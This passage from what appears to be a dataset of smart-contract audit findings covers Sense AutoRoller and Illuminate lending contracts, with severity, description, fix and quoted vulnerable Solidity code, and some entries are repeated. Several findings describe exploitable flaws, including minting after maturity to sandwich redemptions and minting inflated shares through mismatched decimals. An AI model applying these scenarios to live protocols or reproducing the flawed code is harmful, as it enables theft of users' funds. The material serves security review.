Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n\\n function previewMint(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? 
shares : shares.mulDivUp(totalAssets(), supply);\\n}\\n```\\n -Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.чmediumчMath rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.\\nFinally, ERC-4626 Vault implementers should be aware of the need for specific, opposing rounding directions across the different mutable and view methods, as it is considered most secure to favor the Vault itself during calculations over its users:\\nIf (1) it's calculating how many shares to issue to a user for a certain amount of the underlying tokens they provide or (2) it's determining the amount of the underlying tokens to transfer to them for returning a certain amount of shares, it should round down. If (1) it's calculating the amount of shares a user has to supply to receive a given amount of the underlying tokens or (2) it's calculating the amount of underlying tokens a user has to provide to receive a certain amount of shares, it should round up.\\nThen previewWithdraw in AutoRoller.sol should round up.\\nThe original implementation for previewWithdraw in Solmate ERC4626 is:\\n```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n\\nIt is rounding up, however in the implementation of the AutoRoller.sol#previewWith is not round up.\\n```\\nfor (uint256 i = 0; i < 20;) { // 20 chosen as a safe bound for convergence from practical trials.\\n if (guess > supply) {\\n guess = supply;\\n }\\n\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n\\n if (answer >= 0 && answer <= assets.mulWadDown(0.001e18).safeCastToInt() || (prevAnswer == answer)) { // Err on the side of overestimating shares needed. 
Could reduce precision for gas efficiency.\\n break;\\n }\\n\\n if (guess == supply && answer < 0) revert InsufficientLiquidity();\\n\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n\\n unchecked { ++i; }\\n}\\n\\nreturn guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nnote the line:\\n```\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n```\\n\\npreviewRedeem is round down.\\nand later we update guess and return guess\\n```\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n```\\n\\nand\\n```\\n return guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nwhen calculating the the nextGuess, the code does not round up.\\n```\\nint256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n```\\nчRound up in previewWithdraw using mulDivUp and divWadUpчOther protocols that integrate with Sense finance AutoRoller.sol might wrongly assume that the functions handle rounding as per ERC4626 expectation. Thus, it might cause some intergration problem in the future that can lead to wide range of issues for both parties.ч```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n -Funding Rate calculation is not correctчmediumчAccording to the docs, the Funding Rate is intended to correspond to the gap between long and short positions that the Float Pool is required to make up. 
However, as its implemented, the `totalFunding` is calculated only on the size of the overbalanced position, leading to some unexpected situations.\\nAccording to the comments, `totalFunding` is meant to be calculated as follows:\\ntotalFunding is calculated on the notional of between long and short liquidity and 2x long and short liquidity.\\nThis makes sense. The purpose of the funding rate is to compensate the Float Pool for the liquidity provided to balance the market.\\nHowever, the implementation of this function does not accomplish this. Instead, `totalFunding` is based only on the size of the overbalancedValue:\\n```\\nuint256 totalFunding = (2 * overbalancedValue * fundingRateMultiplier * oracleManager.EPOCH_LENGTH()) / (365.25 days * 10000);\\n```\\n\\nThis can be summarized as `2 * overbalancedValue * funding rate percentage * epochs / yr`.\\nThis formula can cause problems, because the size of the overbalanced value doesn't necessarily correspond to the balancing required for the Float Pool.\\nFor these examples, let's set:\\n`fundingRateMultiplier = 100` (1%)\\n`EPOCH_LENGTH() = 3.6525 days` (1% of a year)\\nSITUATION A:\\nOverbalanced: LONG\\nLong Effective Liquidity: 1_000_000 ether\\nShort Effective Liquidity: 999_999 ether\\n`totalFunding = 2 * 1_000_000 ether * 1% * 1% = 200 ether`\\nAmount of balancing supplied by Float = 1mm - 999,999 = 1 ether\\nSITUATION B:\\nOverbalanced: LONG\\nLong Effective Liquidity: 1_000 ether\\nShort Effective Liquidity: 100 ether\\n`totalFunding = 2 * 1_000 ether * 1% * 1% = 0.2 ether`\\nAmount of balancing supplied by Float = 1000 - 100 = 900 ether\\nWe can see that in Situation B, Float supplied 900X more liquidity to the system, and earned 1000X less fees.чAdjust the `totalFunding` formula to represent the stated outcome. 
A simple example of how that might be accomplished is below, but I'm sure there are better implementations:\\n```\\nuint256 totalFunding = ((overbalancedValue - underbalancedValue) * fundingRateMultiplier * oracle.EPOCH_LENGTH()) / (365.25 days * 10_000);\\n```\\nчFunding Rates will not accomplish the stated objective, and will serve to incentivize pools that rely heavily on Float for balancing, while disincentivizing large, balanced markets.ч```\\nuint256 totalFunding = (2 * overbalancedValue * fundingRateMultiplier * oracleManager.EPOCH_LENGTH()) / (365.25 days * 10000);\\n```\\n -Hardcoded divider address in RollerUtils is incorrect and will brick autorollerчmediumчRollerUtils uses a hard-coded constant for the Divider. This address is incorrect and will cause a revert when trying to call AutoRoller#cooldown. If the adapter is combineRestricted then LPs could potentially be unable to withdraw or eject.\\n```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n\\nRollerUtils uses a hardcoded constant DIVIDER to store the Divider address. There are two issues with this. The most pertinent issue is that the current address used is not the correct mainnet address. The second is that if the divider is upgraded, changing the address of the RollerUtils may be forgotten.\\n```\\n (, uint48 prevIssuance, , , , , uint256 iscale, uint256 mscale, ) = DividerLike(DIVIDER).series(adapter, prevMaturity);\\n```\\n\\nWith an incorrect address the divider#series call will revert causing RollerUtils#getNewTargetedRate to revert, which is called in AutoRoller#cooldown. The result is that the AutoRoller cycle can never be completed. LP will be forced to either withdraw or eject to remove their liquidity. Withdraw only works to a certain point because the AutoRoller tries to keep the target ratio. After which the eject would be the only way for LPs to withdraw. During eject the AutoRoller attempts to combine the PT and YT. 
If the adapter is also combineRestricted then there is no longer any way for the LPs to withdraw, causing loss of their funds.чRollerUtils DIVIDER should be set by constructor. Additionally RollerUtils should be deployed by the factory constructor to make sure they always have the same immutable divider reference.чIncorrect hard-coded divider address will brick autorollers for all adapters and will cause loss of funds for combineRestricted adaptersч```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n -AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0чmediumчAutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0\\nlet us look into the implementation of function roll()\\n```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n\\nnote, if lastSettle is 0, we deposit a small amount of token and mint shares to address(0)\\n```\\ndeposit(firstDeposit, address(0));\\n```\\n\\nFirst deposit is a fairly small amount:\\n```\\nfirstDeposit = (0.01e18 - 1) / scalingFactor + 1;\\n```\\n\\nWe can deposit from ERC4626 implementation:\\n```\\nfunction deposit(uint256 assets, address receiver) public virtual returns (uint256 shares) {\\n // Check for rounding error since we round down in previewDeposit.\\n require((shares = previewDeposit(assets)) 
!= 0, \"ZERO_SHARES\");\\n\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n```\\n\\nnote the restriction:\\n```\\n// Check for rounding error since we round down in previewDeposit.\\nrequire((shares = previewDeposit(assets)) != 0, \"ZERO_SHARES\");\\n\\n// Need to transfer before minting or ERC777s could reenter.\\nasset.safeTransferFrom(msg.sender, address(this), assets);\\n```\\n\\nif previewDeposit returns 0 shares, transaction revert. Can previewDeposit returns 0 shares? it is very possible.\\n```\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n if (maturity == MATURITY_NOT_SET) {\\n return super.previewDeposit(assets);\\n } else {\\n Space _space = space;\\n (uint256 ptReserves, uint256 targetReserves) = _getSpaceReserves();\\n\\n // Calculate how much Target we'll end up joining the pool with, and use that to preview minted LP shares.\\n uint256 previewedLPBal = (assets - _getTargetForIssuance(ptReserves, targetReserves, assets, adapter.scaleStored()))\\n .mulDivDown(_space.adjustedTotalSupply(), targetReserves);\\n\\n // Shares represent proportional ownership of LP shares the vault holds.\\n return previewedLPBal.mulDivDown(totalSupply, _space.balanceOf(address(this)));\\n }\\n}\\n```\\n\\nIf (previewedLPBal * total) / space balance is truncated to 0, transaction revert. _space.balanceOf can certainly be inflated if malicious actor send the space token to the address manually. 
Or previewedLPBal * total could just be small and the division is truncated to 0.чWe recommend the project not deposit a such small amount, or there could be a function that let admin gradually control how many tokens should we put in the first deposit.чcalling roll would revert and the new sponsored series cannot be started properly.ч```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n -AutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0чmediumчAutoRoller.sol#roll can revert if lastSettle is zero because solmate ERC4626 deposit revert if previewDeposit returns 0\\nlet us look into the implementation of function roll()\\n```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n\\nnote, if lastSettle is 0, we deposit a small amount of token and mint shares to 
address(0)\\n```\\ndeposit(firstDeposit, address(0));\\n```\\n\\nFirst deposit is a fairly small amount:\\n```\\nfirstDeposit = (0.01e18 - 1) / scalingFactor + 1;\\n```\\n\\nWe can deposit from ERC4626 implementation:\\n```\\nfunction deposit(uint256 assets, address receiver) public virtual returns (uint256 shares) {\\n // Check for rounding error since we round down in previewDeposit.\\n require((shares = previewDeposit(assets)) != 0, \"ZERO_SHARES\");\\n\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n```\\n\\nnote the restriction:\\n```\\n// Check for rounding error since we round down in previewDeposit.\\nrequire((shares = previewDeposit(assets)) != 0, \"ZERO_SHARES\");\\n\\n// Need to transfer before minting or ERC777s could reenter.\\nasset.safeTransferFrom(msg.sender, address(this), assets);\\n```\\n\\nif previewDeposit returns 0 shares, transaction revert. Can previewDeposit returns 0 shares? it is very possible.\\n```\\nfunction previewDeposit(uint256 assets) public view override returns (uint256) {\\n if (maturity == MATURITY_NOT_SET) {\\n return super.previewDeposit(assets);\\n } else {\\n Space _space = space;\\n (uint256 ptReserves, uint256 targetReserves) = _getSpaceReserves();\\n\\n // Calculate how much Target we'll end up joining the pool with, and use that to preview minted LP shares.\\n uint256 previewedLPBal = (assets - _getTargetForIssuance(ptReserves, targetReserves, assets, adapter.scaleStored()))\\n .mulDivDown(_space.adjustedTotalSupply(), targetReserves);\\n\\n // Shares represent proportional ownership of LP shares the vault holds.\\n return previewedLPBal.mulDivDown(totalSupply, _space.balanceOf(address(this)));\\n }\\n}\\n```\\n\\nIf (previewedLPBal * total) / space balance is truncated to 0, transaction revert. 
_space.balanceOf can certainly be inflated if malicious actor send the space token to the address manually. Or previewedLPBal * total could just be small and the division is truncated to 0.чWe recommend the project not deposit a such small amount, or there could be a function that let admin gradually control how many tokens should we put in the first deposit.чcalling roll would revert and the new sponsored series cannot be started properly.ч```\\n /// @notice Roll into the next Series if there isn't an active series and the cooldown period has elapsed.\\n function roll() external {\\n if (maturity != MATURITY_NOT_SET) revert RollWindowNotOpen();\\n\\n if (lastSettle == 0) {\\n // If this is the first roll, lock some shares in by minting them for the zero address.\\n // This prevents the contract from reaching an empty state during future active periods.\\n deposit(firstDeposit, address(0));\\n } else if (lastSettle + cooldown > block.timestamp) {\\n revert RollWindowNotOpen();\\n }\\n\\n lastRoller = msg.sender;\\n adapter.openSponsorWindow();\\n }\\n```\\n -Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.чmediumчMath rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.\\nFinally, ERC-4626 Vault implementers should be aware of the need for specific, opposing rounding directions across the different mutable and view methods, as it is considered most secure to favor the Vault itself during calculations over its users:\\nIf (1) it's calculating how many shares to issue to a user for a certain amount of the underlying tokens they provide or (2) it's determining the amount of the underlying tokens to transfer to them for returning a certain amount of shares, it should round down. 
If (1) it's calculating the amount of shares a user has to supply to receive a given amount of the underlying tokens or (2) it's calculating the amount of underlying tokens a user has to provide to receive a certain amount of shares, it should round up.\\nThen previewWithdraw in AutoRoller.sol should round up.\\nThe original implementation for previewWithdraw in Solmate ERC4626 is:\\n```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n\\nIt is rounding up, however in the implementation of the AutoRoller.sol#previewWith is not round up.\\n```\\nfor (uint256 i = 0; i < 20;) { // 20 chosen as a safe bound for convergence from practical trials.\\n if (guess > supply) {\\n guess = supply;\\n }\\n\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n\\n if (answer >= 0 && answer <= assets.mulWadDown(0.001e18).safeCastToInt() || (prevAnswer == answer)) { // Err on the side of overestimating shares needed. 
Could reduce precision for gas efficiency.\\n break;\\n }\\n\\n if (guess == supply && answer < 0) revert InsufficientLiquidity();\\n\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n\\n unchecked { ++i; }\\n}\\n\\nreturn guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nnote the line:\\n```\\n int256 answer = previewRedeem(guess.safeCastToUint()).safeCastToInt() - assets.safeCastToInt();\\n```\\n\\npreviewRedeem rounds down.\\nand later we update guess and return guess\\n```\\n int256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n prevGuess = guess;\\n prevAnswer = answer;\\n guess = nextGuess;\\n```\\n\\nand\\n```\\n return guess.safeCastToUint() + maxError; // Buffer for pow discrepancies.\\n```\\n\\nwhen calculating the nextGuess, the code does not round up.\\n```\\nint256 nextGuess = guess - (answer * (guess - prevGuess) / (answer - prevAnswer));\\n```\\nчRound up in previewWithdraw using mulDivUp and divWadUpчOther protocols that integrate with Sense finance AutoRoller.sol might wrongly assume that the functions handle rounding as per ERC4626 expectation. Thus, it might cause some integration problem in the future that can lead to a wide range of issues for both parties.ч```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n -Lender#lend for Sense has mismatched decimalsчhighчThe decimals of the Sense principal token don't match the decimals of the ERC5095 vault it mints shares to. 
This can be abused on the USDC market to mint a large number of shares to steal yield from all other users.\\n```\\n uint256 received;\\n {\\n // Get the starting balance of the principal token\\n uint256 starting = token.balanceOf(address(this));\\n\\n // Swap those tokens for the principal tokens\\n ISensePeriphery(x).swapUnderlyingForPTs(adapter, s, lent, r);\\n\\n // Calculate number of principal tokens received in the swap\\n received = token.balanceOf(address(this)) - starting;\\n\\n // Verify that we received the principal tokens\\n if (received < r) {\\n revert Exception(11, 0, 0, address(0), address(0));\\n }\\n }\\n\\n // Mint the Illuminate tokens based on the returned amount\\n IERC5095(principalToken(u, m)).authMint(msg.sender, received);\\n```\\n\\nSense principal tokens for DIA and USDC are 8 decimals to match the decimals of the underlying cTokens, cUSDC and cDAI. The decimals of the ERC5095 vault matches the underlying of the vault. This creates a disparity in decimals that aren't adjusted for in Lender#lend for Sense, which assumes that the vault and Sense principal tokens match in decimals. In the example of USDC the ERC5095 will be 6 decimals but the sense token will be 8 decimals. Each 1e6 USDC token will result in ~1e8 Sense tokens being received. Since the contract mints based on the difference in the number of sense tokens before and after the call, it will mint ~100x the number of vault shares than it should. 
Since the final yield is distributed pro-rata to the number of shares, the user who minted with sense will be entitled to much more yield than they should be and everyone else will get substantially less.чIssue Lender#lend for Sense has mismatched decimals\\nQuery the decimals of the Sense principal and use that to adjust the decimals to match the decimals of the vault.чUser can mint large number of shares to steal funds from other usersч```\\n uint256 received;\\n {\\n // Get the starting balance of the principal token\\n uint256 starting = token.balanceOf(address(this));\\n\\n // Swap those tokens for the principal tokens\\n ISensePeriphery(x).swapUnderlyingForPTs(adapter, s, lent, r);\\n\\n // Calculate number of principal tokens received in the swap\\n received = token.balanceOf(address(this)) - starting;\\n\\n // Verify that we received the principal tokens\\n if (received < r) {\\n revert Exception(11, 0, 0, address(0), address(0));\\n }\\n }\\n\\n // Mint the Illuminate tokens based on the returned amount\\n IERC5095(principalToken(u, m)).authMint(msg.sender, received);\\n```\\n -Lend or mint after maturityчhighчThe protocol does not forbid lending or minting after the maturity leaving the possibility to profit from early users.\\nLet's take the mint function as an example:\\n```\\n function mint(\\n uint8 p,\\n address u,\\n uint256 m,\\n uint256 a\\n ) external unpaused(u, m, p) returns (bool) {\\n // Fetch the desired principal token\\n address principal = IMarketPlace(marketPlace).token(u, m, p);\\n\\n // Transfer the users principal tokens to the lender contract\\n Safe.transferFrom(IERC20(principal), msg.sender, address(this), a);\\n\\n // Mint the tokens received from the user\\n IERC5095(principalToken(u, m)).authMint(msg.sender, a);\\n\\n emit Mint(p, u, m, a);\\n\\n return true;\\n }\\n```\\n\\nIt is a simple function that accepts the principal token and mints the corresponding ERC5095 tokens in return. 
There are no restrictions on timing, the user can mint even after the maturity. Malicious actors can take this as an advantage to pump their bags on behalf of legitimate early users.\\nScenario:\\nLegitimate users lend and mint their ERC5095 tokens before maturity.\\nWhen the maturity kicks in, lender tokens are redeemed and holdings are updated.\\nLegitimate users try to redeem their ERC5095 for the underlying tokens. The formula is `(amount * holdings[u][m]) / token.totalSupply();`\\nA malicious actor sandwiches legitimate users, and mints the ERC5095 thus increasing the totalSupply and reducing other user shares. Then redeem principals again and burn their own shares for increased rewards.\\nExample with concrete values:\\nuserA deposits `100` tokens, user B deposits `200` tokens. The total supply minted is `300` ERC5095 tokens.\\nAfter the maturity the redemption happens and now let's say `holdings[u][m]` is `330` (+30).\\nuserA tries to redeem the underlying. The expected amount is: `100` * `330` / `300` = 110. However, this action is frontrunned by userC (malicious) who mints yet another `500` tokens post-maturity. The total supply becomes `800`. The real value userA now receives is: 110 * `330` / `800` = 45.375.\\nAfter that the malicious actor userC invokes the redemption again, and the `holdings[u][m]` is now `330` - 45.375 + `550` = 834.625.\\nuserC redeems the underlying: `500` * 834.625 / 700 ~= 596.16 (expected was 550).\\nNow all the remaining users will also slightly benefit, e.g. 
in this case userB redeems what's left: `200` * 238.46 / `200` = 238.46 (expected was 220).чIssue Lend or mint after maturity\\nLend/mint should be forbidden post-maturity.чThe amount legitimate users receive will be devalued, while malicious actors can increase their ROI without meaningfully contributing to the protocol and locking their tokens.ч```\\n function mint(\\n uint8 p,\\n address u,\\n uint256 m,\\n uint256 a\\n ) external unpaused(u, m, p) returns (bool) {\\n // Fetch the desired principal token\\n address principal = IMarketPlace(marketPlace).token(u, m, p);\\n\\n // Transfer the users principal tokens to the lender contract\\n Safe.transferFrom(IERC20(principal), msg.sender, address(this), a);\\n\\n // Mint the tokens received from the user\\n IERC5095(principalToken(u, m)).authMint(msg.sender, a);\\n\\n emit Mint(p, u, m, a);\\n\\n return true;\\n }\\n```\\n -Incorrect parametersчmediumчSome functions and integrations receive the wrong parameters.\\nHere, this does not work:\\n```\\n } else if (p == uint8(Principals.Notional)) {\\n // Principal token must be approved for Notional's lend\\n ILender(lender).approve(address(0), address(0), address(0), a);\\n```\\n\\nbecause it basically translates to:\\n```\\n } else if (p == uint8(Principals.Notional)) {\\n if (a != address(0)) {\\n Safe.approve(IERC20(address(0)), a, type(uint256).max);\\n }\\n```\\n\\nIt tries to approve a non-existing token. 
It should approve the underlying token and Notional's token contract.\\nAnother issue is with Tempus here:\\n```\\n // Swap on the Tempus Router using the provided market and params\\n ITempus(controller).depositAndFix(x, lent, true, r, d);\\n\\n // Calculate the amount of Tempus principal tokens received after the deposit\\n uint256 received = IERC20(principal).balanceOf(address(this)) - start;\\n\\n // Verify that a minimum number of principal tokens were received\\n if (received < r) {\\n revert Exception(11, received, r, address(0), address(0));\\n }\\n```\\n\\nIt passes `r` as a slippage parameter and later checks that received >= `r`. However, in Tempus this parameter is not exactly the minimum amount to receive, it is the ratio which is calculated as follows:\\n```\\n /// @param minTYSRate Minimum exchange rate of TYS (denominated in TPS) to receive in exchange for TPS\\n function depositAndFix(\\n ITempusAMM tempusAMM,\\n uint256 tokenAmount,\\n bool isBackingToken,\\n uint256 minTYSRate,\\n uint256 deadline\\n ) external payable nonReentrant {\\n// rest of code\\n uint256 minReturn = swapAmount.mulfV(minTYSRate, targetPool.backingTokenONE());\\n```\\nчReview all the integrations and function invocations, and make sure the appropriate parameters are passed.чInaccurate parameter values may lead to protocol misfunction down the road, e.g. insufficient approval or unpredicted slippage.ч```\\n } else if (p == uint8(Principals.Notional)) {\\n // Principal token must be approved for Notional's lend\\n ILender(lender).approve(address(0), address(0), address(0), a);\\n```\\n -Sense PT redemptions do not allow for known loss scenariosчmediumчSense PT redemptions do not allow for known loss scenarios, which will lead to principal losses\\nThe Sense PT redemption code in the `Redeemer` expects any losses during redemption to be due to a malicious adapter, and requires that there be no losses. 
However, there are legitimate reasons for there to be losses which aren't accounted for, which will cause the PTs to be unredeemable. The Lido FAQ page lists two such reasons:\\n```\\n- Slashing risk\\n\\nETH 2.0 validators risk staking penalties, with up to 100% of staked funds at risk if validators fail. To minimise this risk, Lido stakes across multiple professional and reputable node operators with heterogeneous setups, with additional mitigation in the form of insurance that is paid from Lido fees.\\n\\n- stETH price risk\\n\\nUsers risk an exchange price of stETH which is lower than inherent value due to withdrawal restrictions on Lido, making arbitrage and risk-free market-making impossible. \\n\\nThe Lido DAO is driven to mitigate above risks and eliminate them entirely to the extent possible. Despite this, they may still exist and, as such, it is our duty to communicate them.\\n```\\n\\nIf Lido is slashed, or there are withdrawal restrictions, the Sense series sponsor will be forced to settle the series, regardless of the exchange rate (or miss out on their rewards). The Sense `Divider` contract anticipates and properly handles these losses, but the Illuminate code does not.\\nLido is just one example of a Sense token that exists in the Illuminate code base - there may be others added in the future which also require there to be allowances for losses.чAllow losses during redemption if Sense's `Periphery.verified()` returns `true`чPermanent freezing of funds\\nThere may be a malicious series sponsor that purposely triggers a loss, either by DOSing Lido validators, or by withdrawing enough to trigger withdrawal restrictions. 
In such a case, the exchange rate stored by Sense during the settlement will lead to losses, and users that hold Illuminate PTs (not just the users that minted Illuminate PTs with Sense PTs), will lose their principal, because Illuminate PT redemptions are on a share-of-underlying basis, not on the basis of the originally-provided token.\\nWhile the Illuminate project does have an emergency `withdraw()` function that would allow an admin to rescue the funds and manually distribute them, this would not be trustless and defeats the purpose of having a smart contract.ч```\\n- Slashing risk\\n\\nETH 2.0 validators risk staking penalties, with up to 100% of staked funds at risk if validators fail. To minimise this risk, Lido stakes across multiple professional and reputable node operators with heterogeneous setups, with additional mitigation in the form of insurance that is paid from Lido fees.\\n\\n- stETH price risk\\n\\nUsers risk an exchange price of stETH which is lower than inherent value due to withdrawal restrictions on Lido, making arbitrage and risk-free market-making impossible. \\n\\nThe Lido DAO is driven to mitigate above risks and eliminate them entirely to the extent possible. 
Despite this, they may still exist and, as such, it is our duty to communicate them.\\n```\\n -Notional PT redemptions do not use flash-resistant pricesчmediumчNotional PT redemptions do not use the correct function for determining balances, which will lead to principal losses\\nEIP-4626 states the following about maxRedeem():\\n```\\nMUST return the maximum amount of shares that could be transferred from `owner` through `redeem` and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary).\\n\\nMUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST return 0.\\n```\\n\\nThe above means that the implementer is free to return less than the actual balance, and is in fact required to return zero if the token's backing store is paused, and Notional's can be paused. While neither of these conditions currently apply to the existing wfCashERC4626 implementation, there is nothing stopping Notional from implementing the MUST-return-zero-if-paused fix tomorrow, or from changing their implementation to one that requires `maxRedeem()` to return something other than the current balance.чUse `balanceOf()` rather than `maxRedeem()` in the call to `INotional.redeem()`, and make sure that Illuminate PTs can't be burned if `Lender` still has Notional PTs that it needs to redeem (based on its own accounting of what is remaining, not based on balance checks, so that it can't be griefed with dust).чPermanent freezing of funds\\nIf `maxRedeem()` were to return zero, or some other non-exact value, fewer Notional PTs would be redeemed than are available, and users that redeem()ed their shares, would receive fewer underlying (principal if they minted Illuminate PTs with Notional PTs, e.g. to be an LP in the pool) than they are owed. 
The Notional PTs that weren't redeemed would still be available for a subsequent call, but if a user already redeemed their Illuminate PTs, their loss will already be locked in, since their Illuminate PTs will have been burned. This would affect ALL Illuminate PT holders of a specific market, not just the ones that provided the Notional PTs, because Illuminate PT redemptions are an a share-of-underlying basis, not on the basis of the originally-provided token. Markets that are already live with Notional set cannot be protected via a redemption pause by the Illuminate admin, because redemption of Lender's external PTs for underlying does not use the `unpaused` modifier, and does have any access control.ч```\\nMUST return the maximum amount of shares that could be transferred from `owner` through `redeem` and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary).\\n\\nMUST factor in both global and user-specific limits, like if redemption is entirely disabled (even temporarily) it MUST return 0.\\n```\\n -Marketplace.setPrincipal do not approve needed allowance for Element vault and APWine routerчmediumч`Marketplace.setPrincipal` do not approve needed allowance for `Element vault` and `APWine router`\\n`Marketplace.setPrincipal` is used to provide principal token for the base token and maturity when it was not set yet. To set PT you also provide protocol that this token belongs to.\\nIn case of `APWine` protocol there is special block of code to handle all needed allowance. But it is not enough.\\n```\\n } else if (p == uint8(Principals.Apwine)) {\\n address futureVault = IAPWineToken(a).futureVault();\\n address interestBearingToken = IAPWineFutureVault(futureVault)\\n .getIBTAddress();\\n IRedeemer(redeemer).approve(interestBearingToken);\\n } else if (p == uint8(Principals.Notional)) {\\n```\\n\\nBut in `setPrincipal` we don't have such params and allowance is not set. 
So `Lender` will not be able to work with that tokens correctly.чAdd 2 more params as in `createMarket` and call `ILender(lender).approve(u, e, a, address(0));`чLender will not provide needed allowance and protocol integration will fail.ч```\\n } else if (p == uint8(Principals.Apwine)) {\\n address futureVault = IAPWineToken(a).futureVault();\\n address interestBearingToken = IAPWineFutureVault(futureVault)\\n .getIBTAddress();\\n IRedeemer(redeemer).approve(interestBearingToken);\\n } else if (p == uint8(Principals.Notional)) {\\n```\\n -ERC5095.mint function calculates slippage incorrectlyчmediumчERC5095.mint function calculates slippage incorrectly. This leads to lost of funds for user.\\n`ERC5095.mint` function should take amount of shares that user wants to receive and then buy this amount. It uses hardcoded 1% slippage when trades base tokens for principal. But it takes 1% of calculated assets amount, not shares.\\n```\\n function mint(address r, uint256 s) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 assets = Cast.u128(previewMint(s));\\n Safe.transferFrom(\\n IERC20(underlying),\\n msg.sender,\\n address(this),\\n assets\\n );\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n\\nThis is how slippage is provided\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n```\\n\\nBut the problem is that assets it is amount of base tokens that user should pay for the shares he want to receive. Slippage should be calculated using shares amount user expect to get.\\nExample. 
